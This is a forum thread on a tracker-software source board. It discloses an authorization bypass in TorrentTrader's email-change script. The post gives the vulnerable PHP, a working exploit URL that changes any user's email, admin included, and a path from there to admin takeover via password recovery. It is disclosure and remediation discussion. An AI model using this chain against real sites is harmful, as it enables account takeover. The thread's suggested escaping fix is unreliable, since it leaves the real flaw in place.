Bravo List
Register
Go Back   > Bravo List > Source Code > Active Trackers > Torrent Trader
Reply
  #1  
Old 9th April 2019, 19:28
BamBam0077 BamBam0077 is offline
Banned
 
Join Date: Jul 2013
P2P
Posts: 410
Default Unauthorized Email Change
################################################## #############################
1. Unauthorized Email Change in "account-ce.php"
################################################## #############################

Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------

PHP Code:
$id = (int) $_GET["id"]; 
$md5 $_GET["secret"]; 
$email $_GET["email"]; 
$res SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); 
$row mysql_fetch_assoc($res);
$sec $row["editsecret"]; 
if (
$md5 != md5($sec $email $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); 
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " sqlesc($row["editsecret"])); 
-----------------[ source code end ]-----------------------------------

Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com
Quick look to the database confirms, that email address of user with ID 1 has been changed indeed.
Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php
After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution.

################################################## #############################

Last edited by Thor; 14th April 2019 at 11:31. Reason: Edited Code to make it Readable
Reply With Quote
  #2  
Old 13th April 2019, 05:15
MicroMonkey's Avatar
MicroMonkey MicroMonkey is offline
Senior Member
 
Join Date: Jun 2016
P2P
Posts: 52
Default
what is that? Please explain in full detail
Reply With Quote
  #3  
Old 13th April 2019, 15:36
BamBam0077 BamBam0077 is offline
Banned
 
Join Date: Jul 2013
P2P
Posts: 410
Default
Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email" Preconditions: none Result: attacker can change any user's email, including admin's
Code:
 $id = (int) $_GET["id"]; $md5 = $_GET["secret"]; $email = $_GET["email"]; .. $res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); $row = mysql_fetch_assoc($res); .. $sec = $row["editsecret"]; if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));

Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test @test.com

Quick look to the database confirms, that email address of user with ID 1 has been changed indeed.

Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution.
Reply With Quote
The Following User Says Thank You to BamBam0077 For This Useful Post:
papad (13th April 2019)
  #4  
Old 30th April 2019, 16:22
M-jay M-jay is offline
VIP
 
Join Date: May 2018
Posts: 19
Default
This would be sql injection correct? I've been looking at adding something to improve this. So far it looks like pdo is the best or can you do it using composer.json.
Im new to this but could you point us in right direction to implement one of these.
Reply With Quote
The Following User Says Thank You to M-jay For This Useful Post:
BamBam0077 (21st October 2019)
  #5  
Old 21st October 2019, 19:39
BamBam0077 BamBam0077 is offline
Banned
 
Join Date: Jul 2013
P2P
Posts: 410
Default
Just sanitize the variables in SQL query where necessary sqlesc() or mysqli_real_string_escape() if you have converted over to mysqli and I believe try to use trim() around:

PHP Code:
$md5 $_GET["secret"]; 
$email $_GET["email"]; 
$sec $row["editsecret"]; 
SQL ESC
PHP Code:
$res SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '".sqlesc($id)."'"); 
[
B]AND[/B]
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = ' " sqlesc($id)."' AND `editsecret` = " sqlesc($row["editsecret"])); 
NOT TESTED YET WILL TRY WHEN PC HAS ARRIVED
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump



All times are GMT +2. The time now is 15:24. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.